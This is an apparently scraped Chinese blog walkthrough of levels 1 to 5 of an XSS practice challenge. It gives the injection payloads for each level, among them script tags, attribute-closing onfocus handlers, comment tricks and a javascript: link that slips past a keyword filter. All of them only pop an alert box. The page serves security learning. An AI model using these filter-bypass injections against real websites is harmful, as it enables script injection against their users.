xss挑战之旅Level 1-5

XSS挑战之旅
xss挑战之旅Level 1-5_第1张图片

Level 1

xss挑战之旅Level 1-5_第2张图片

发现参数name的内容是一个注入点,并且没有任何过滤

payload:?name=test<script>alert('xss')script>

xss挑战之旅Level 1-5_第3张图片

Level 2

xss挑战之旅Level 1-5_第4张图片

和第一关差不多,在搜索框中输入

<script>alert('xxs')script>

没有出现弹窗
xss挑战之旅Level 1-5_第5张图片
查看一下源代码
xss挑战之旅Level 1-5_第6张图片

需要把前面的标签给闭合掉

在搜索框中输入

"><script>alert('xxs')script><"

xss挑战之旅Level 1-5_第7张图片

Level 3

xss挑战之旅Level 1-5_第8张图片
查看源码,value为单引号闭合
在这里插入图片描述

在搜索框中输入

<script>alert('xxs')script>

查看源代码,输入点在value属性里面
在这里插入图片描述
发现<>被转义了
方法一:
我们用javascript里边的onfocus事件,并且使用'把value给闭合掉。

在搜素框中输入

xss'  οnfοcus=javascript:alert("xss") '

xss挑战之旅Level 1-5_第9张图片

Level 4

xss挑战之旅Level 1-5_第10张图片
在搜索框中输入

<script>alert('xxs')script>

查看源码,输入点在value属性里面
在这里插入图片描述
方法一:
发现过滤了<>,用双引号"把value闭合。

继续在搜素框中输入

xss"  οnfοcus=javascript:alert("xss") "

xss挑战之旅Level 1-5_第11张图片

方法二:

payload: "οnfοcus=alert(1)

在这里插入图片描述
闭合了前面的双引号,但是后面多了一个双引号,用//注释掉

Payload:

"οnfοcus=alert(1)//

xss挑战之旅Level 1-5_第12张图片

Level 5

xss挑战之旅Level 1-5_第13张图片

在搜索框中输入

<script>alert('xxs')script>

查看源码
在这里插入图片描述
发现script被转义为scr_ipt

在搜素框中输入

"><a href="javascript:alert('xss')">testa>

xss挑战之旅Level 1-5_第14张图片

你可能感兴趣的:(XSS,xss)